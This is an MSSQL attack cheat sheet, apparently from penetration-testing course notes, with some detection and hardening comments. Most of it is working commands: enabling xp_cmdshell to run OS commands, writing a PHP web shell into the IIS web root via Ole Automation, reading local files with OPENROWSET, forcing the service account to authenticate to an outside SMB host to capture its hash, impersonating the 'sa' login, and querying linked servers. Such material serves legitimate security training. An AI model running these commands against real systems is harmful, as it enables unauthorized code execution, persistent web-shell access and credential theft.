MSSQL
MSSQL uses TCP/1433 (database engine, default instance) and UDP/1434 (SQL Server Browser service)
Interacting with MSSQL
# Client invocations for connecting to MSSQL; <ip>, <user>, <FQDN/IP> and P@sswd are placeholders
mssqlclient.py -p 1433 user@<ip>
mssqlclient.py <user>@<FQDN/IP> -windows-auth # connect using Windows Auth
# Passing -P on the command line leaves the password in shell history and process listings;
# omit it and sqsh/sqlcmd prompt for it interactively (mssqlclient.py prompts when no password is given)
# -h suppresses column headers and footers in sqsh output
sqsh -S <ip> -U user -P P@sswd -h
sqsh -S <ip> -U .\\user -P 'P@sswd' -h # Windows Auth local account
# -y / -Y set the display width for variable-length and fixed-length column types
sqlcmd.exe -S <ip> -U user -P P@sswd -y 30 -Y 30
SQL Syntax
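-- Comments use "--" so the snippet is valid T-SQL when pasted as a batch
-- Show databases (sysdatabases is the legacy compatibility view; sys.databases is the supported catalog view)
SELECT name FROM master.dbo.sysdatabases
-- Select a database
USE htbusers
-- Show tables in the selected database
SELECT table_name FROM htbusers.INFORMATION_SCHEMA.TABLES
-- Select all data from table "users"
SELECT * FROM users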
Execute Commands
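-- Command execution using xp_cmdshell. It is disabled by default; enabling it
-- requires the ALTER SETTINGS server permission (sysadmin/serveradmin), and every
-- sp_configure change is written to the SQL Server error log
-- ("Configuration option 'xp_cmdshell' changed from 0 to 1"), which is a
-- useful detection point.
-- EXECUTE is spelled out so each call also works when it is not the first
-- statement of a batch; run GO after each statement when using sqlcmd/sqsh.
EXECUTE sp_configure 'show advanced options', 1
RECONFIGURE
EXECUTE sp_configure 'xp_cmdshell', 1
RECONFIGURE
-- The command runs under the SQL Server service account (or the xp_cmdshell
-- proxy account for non-sysadmin callers, if one is configured)
EXECUTE xp_cmdshell 'whoami'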
Read & Write Local Files
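-- Enable Ole Automation Procedures (off by default; needs ALTER SETTINGS, and the
-- change is logged to the SQL Server error log like any sp_configure change).
-- EXECUTE is spelled out so the second sp_configure call also works when the
-- lines are run as a single batch instead of one GO per line.
EXECUTE sp_configure 'show advanced options', 1
RECONFIGURE
EXECUTE sp_configure 'Ole Automation Procedures', 1
RECONFIGURE
-- Create a file through Scripting.FileSystemObject. The write happens as the
-- SQL Server service account, so the target path must be writable by it.
DECLARE @OLE INT
DECLARE @FileID INT
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
-- OpenTextFile(path, iomode, create): 8 = ForAppending, 1 = create if missing
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
-- Release both COM handles
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE
GO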
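-- Read local files
-- OPENROWSET(BULK ...) reads with the SQL Server service account's file
-- permissions, so it reaches any file that account can read; the calling login
-- needs the ADMINISTER BULK OPERATIONS server permission (held by sysadmin and
-- bulkadmin). There is no sp_configure switch for this, so hardening means
-- restricting that permission and the service account's file access.
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents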
Capture MSSQL Service Hash
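-- Run responder OR impacket-smbserver
-- XP_DIRTREE and XP_SUBDIRS hash stealing for the user mssqlsvc
-- Pointing either procedure at a UNC path makes the SQL Server service account
-- authenticate outbound over SMB to that host. Defensively: block outbound
-- TCP/445 from database hosts, run the service under a low-privilege or
-- group-managed service account, and alert on xp_dirtree/xp_subdirs calls
-- whose argument is a UNC path.
EXEC master..xp_dirtree '\\10.10.110.17\share\'
EXEC master..xp_subdirs '\\10.10.110.17\share\'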
Impersonate Existing Users with MSSQL
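-- Identify logins that can be impersonated
-- NOTE(review): the join is on grantor_principal_id (the login that granted the
-- permission) rather than major_id (the login the IMPERSONATE permission
-- targets); the two coincide when the target login granted it itself, so
-- confirm against sys.server_permissions.major_id before relying on the list.
SELECT DISTINCT sp.name
FROM sys.server_permissions AS perm
INNER JOIN sys.server_principals AS sp
    ON perm.grantor_principal_id = sp.principal_id
WHERE perm.permission_name = 'IMPERSONATE'
GO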
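-- Verify the effective login and role after switching context
-- EXECUTE AS LOGIN is recommended to be run within the master DB. Every
-- EXECUTE AS should be paired with a REVERT; the context switch is captured by
-- SQL Server Audit (SERVER_PRINCIPAL_IMPERSONATION_GROUP), which is the place
-- to look for unexpected impersonation of privileged logins.
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
GO
-- Revert to the original login
REVERT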
Linked Database
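-- Identify linked servers in MSSQL: isremote = 1 is a remote server, 0 is a linked server
-- (sysservers is a compatibility view; sys.servers with its is_linked column is the supported catalog view)
SELECT srvname, isremote FROM sysservers
-- Send a pass-through query to a linked server. This needs the "rpc out"
-- option enabled for that linked server (sp_serveroption), and it runs with
-- whatever login mapping the linked server was configured with, so linked
-- servers mapped to a fixed privileged login are worth auditing (sys.linked_logins).
EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]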